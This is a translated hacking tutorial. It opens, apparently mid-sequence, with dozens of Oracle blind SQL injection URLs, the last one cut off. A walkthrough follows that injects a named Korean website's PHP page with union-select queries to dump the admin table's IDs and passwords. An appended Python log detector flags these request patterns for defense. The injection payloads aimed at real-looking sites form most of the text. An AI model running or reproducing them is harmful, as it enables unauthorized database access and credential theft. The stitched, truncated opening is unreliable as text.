www.test.net/index_kaoyan_view.jsp?id=117 And 82>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),4,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 83=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=1)ORDER BY 2DESC)WHERE ROWNUM<=1),5,1))

The following guesses the second column:

www.test.net/index_kaoyan_view.jsp?id=117 And 0<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 1>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 2<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 4>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 5<=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 9>=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 7=nvl(length((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1)),0)

www.test.net/index_kaoyan_view.jsp?id=117 And 65=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 78>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 71>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 74>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),1,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 72=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 95=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81=ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 81>ascii(substr((SELECT COLUMN_NAME FROM(SELECT*FROM(SELECT*FROM(SELECT*FROM COLS WHERE TABLE_NAME=CHR(65)||CHR(68) ORDER BY 2ASC)WHERE ROWNUM<=2)ORDER BY 2DESC)WHERE ROWNUM<=1),2,1))

www.test.net/index_kaoyan_view.jsp?id=117 And 76=ascii(substr((SELECT COLUMN_N

Part 9: Learn PHP Manual Injection with Me (Script Security)

Author: 冰的原点[L.S.T]

After reading so much about ASP injection, are you all getting tired of injection on the ASP side? Heh, don't get tired of it: only by learning continuously will you avoid being left far behind. So today, follow along with me and learn manual injection in a PHP environment.

Today's site is a Korean website, and I have already found the injection point. If you want to save yourself the trouble, you can use 啊D to look for injection points: 啊D can find not only injection points in ASP environments but also in PHP, ASPX and JSP. Here is a screenshot, see Figure 1.

Finding an injection point is easy for 啊D, but what follows has to be done by our own hands. Back to the main text: first we need to determine whether the database is MySQL. Enter /* at the injection point; if the page returns normally, it is MySQL, because MySQL supports /* comments. As in Figure 2, the correct page is returned.

Then we need to determine the MySQL version; if it supports union queries, things are much easier. Enter the following at the injection point: and ord(mid(version(),1,1))>51/*. It returns normally, as in Figure 3, which means the database version is above 4.0, that is, union queries are supported. At this point it is best to check the privilege level first; if it is root, the later privilege escalation is much easier. We submit: ord(mid(user(),1,1))=114/*. It returns an error, so these are not root privileges, and we have no choice but to guess tables the hard way.

Next, guess its number of columns. With order by followed by a number, the column count can be found quickly. For example, I submit: www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 10, which returns normally, meaning the column count is greater than 10, as in Figure 4. Keep guessing: submitting www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 20 returns an error, as in Figure 5, meaning the column count is less than 20. The rest is grunt work: when www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 17 is normal and www.xx.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 order by 18 errors, the column count is 17.

Next we have to guess column names. We submit: www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* as in Figure 6. In the positions where numbers are displayed on the page we substitute our own expressions and submit again: www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17/*, as in Figure 7; the version number and, of course, the database user name appear.

Next, naturally, is guessing tables. The first that comes to mind is of course the admin table. Submit: www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17%20from%20admin/*, which returns normally, so the admin table exists. Now comes the most critical part: we have to guess the user name and password columns. Submit: www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),username,8,9,10,11,12,13,14,15,16,17%20from%20admin/*, which returns an error, so apparently there is no column named username. What follows is a long guessing process, and I never did guess the user name column, but I did get the ID and password out. The statement I submitted was: www.lifeloan.co.kr/notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20%20and%201=2%20union%20select%201,2,3,4,version(),user(),id,passwd,9,10,11,12,13,14,15,16,17%20from%20admin/*. Heh, it was dumped, as in Figure 8.

That brings the article to an end. What matters is really just the process: the user name was not dumped, and the admin backend was not found afterwards either, so it had to be set aside. Still, if you fellow readers can learn something from this article, it will have had its value.
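Seen from the web server rather than the browser, both walk-throughs above leave a very recognisable trail: the Oracle blind search is dozens of requests that differ only in the compared number (`ascii(substr(...))`, `nvl(length(...))`, all querying COLS), and the MySQL walk-through is `/*` terminators, `order by N` column counting, `union select 1,2,...` and `version()`/`user()` probes. The detector below is an added example written for this page, not code from either article or from the tools they use; it assumes combined-format access logs (ip, timestamp, request line, status), and the log lines and signature names are constructed for the example.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Combined-log style line: <ip> - - [time] "GET /path?query HTTP/1.1" <status> <bytes>
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<url>\S+) \S+" (?P<status>\d{3})'
)

# Signatures for the request shapes shown in the two walk-throughs above; each is
# applied to the URL-decoded, lower-cased query string.
SIGNATURES = [
    ("blind_ascii_substr", re.compile(r"\b(and|or)\s+\d+\s*[=<>]+\s*ascii\s*\(\s*substr")),
    ("blind_length_probe", re.compile(r"\b(and|or)\s+\d+\s*[=<>]+\s*(nvl\s*\(\s*)?length\s*\(")),
    ("oracle_dictionary_view", re.compile(r"\bfrom\s+(cols|all_tab_columns|user_tab_columns)\b")),
    ("mysql_comment_terminator", re.compile(r"/\*\s*$")),
    ("order_by_column_count", re.compile(r"\border\s+by\s+\d+")),
    ("union_select_enum", re.compile(r"\bunion\s+select\b")),
    ("db_fingerprint", re.compile(r"\b(version|user)\s*\(\s*\)")),
]

# Constructed sample traffic (not real logs) mirroring the requests on this page.
SAMPLE_LOG = [
    '203.0.113.7 - - [15/Feb/2023:07:38:34 +0800] "GET /index_kaoyan_view.jsp?id=117%20And%2067=ascii(substr((SELECT%20COLUMN_NAME%20FROM%20COLS%20WHERE%20TABLE_NAME=CHR(65)||CHR(68)),2,1)) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Feb/2023:07:38:35 +0800] "GET /index_kaoyan_view.jsp?id=117%20And%2095=ascii(substr((SELECT%20COLUMN_NAME%20FROM%20COLS%20WHERE%20TABLE_NAME=CHR(65)||CHR(68)),2,1)) HTTP/1.1" 200 5120',
    '203.0.113.7 - - [15/Feb/2023:07:38:36 +0800] "GET /index_kaoyan_view.jsp?id=117%20And%202<=nvl(length((SELECT%20COLUMN_NAME%20FROM%20COLS%20WHERE%20TABLE_NAME=CHR(65)||CHR(68))),0) HTTP/1.1" 200 5120',
    '198.51.100.23 - - [15/Feb/2023:07:40:01 +0800] "GET /notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20order%20by%2017 HTTP/1.1" 200 8812',
    '198.51.100.23 - - [15/Feb/2023:07:40:09 +0800] "GET /notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5%20and%201=2%20union%20select%201,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15,16,17%20from%20admin/* HTTP/1.1" 200 8812',
    '192.0.2.10 - - [15/Feb/2023:07:41:00 +0800] "GET /notice/read.php?Code=notice&Page=1&Field=&Key=&Uid=5 HTTP/1.1" 200 8812',
    "not a log line at all",
]


def classify_query(query):
    """Names of the signatures matching one raw (still URL-encoded) query string."""
    decoded = unquote_plus(query).lower()
    return [name for name, rx in SIGNATURES if rx.search(decoded)]


def analyze_log(lines):
    """Per client IP, count the requests hitting each signature.

    A boolean-blind binary search sends many near-identical requests that differ
    only in the compared number, so per-signature counts are the strongest signal.
    """
    report = defaultdict(lambda: defaultdict(int))
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip it rather than abort the scan
        query = m.group("url").partition("?")[2]
        for name in classify_query(query):
            report[m.group("ip")][name] += 1
    return {ip: dict(hits) for ip, hits in report.items()}


def suspicious_clients(report, min_hits=3):
    """(ip, total hits) for clients reaching min_hits, most active first."""
    totals = [(ip, sum(h.values())) for ip, h in report.items()]
    return sorted([t for t in totals if t[1] >= min_hits], key=lambda t: -t[1])


if __name__ == "__main__":
    print(suspicious_clients(analyze_log(SAMPLE_LOG)))
```

The threshold matters more than any single signature: one `order by` in a query string may be legitimate, but a client emitting dozens of `ascii(substr(` comparisons against the same parameter is the binary search shown above and a good trigger for blocking and for checking whether the parameter is passed to the database unparameterized.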
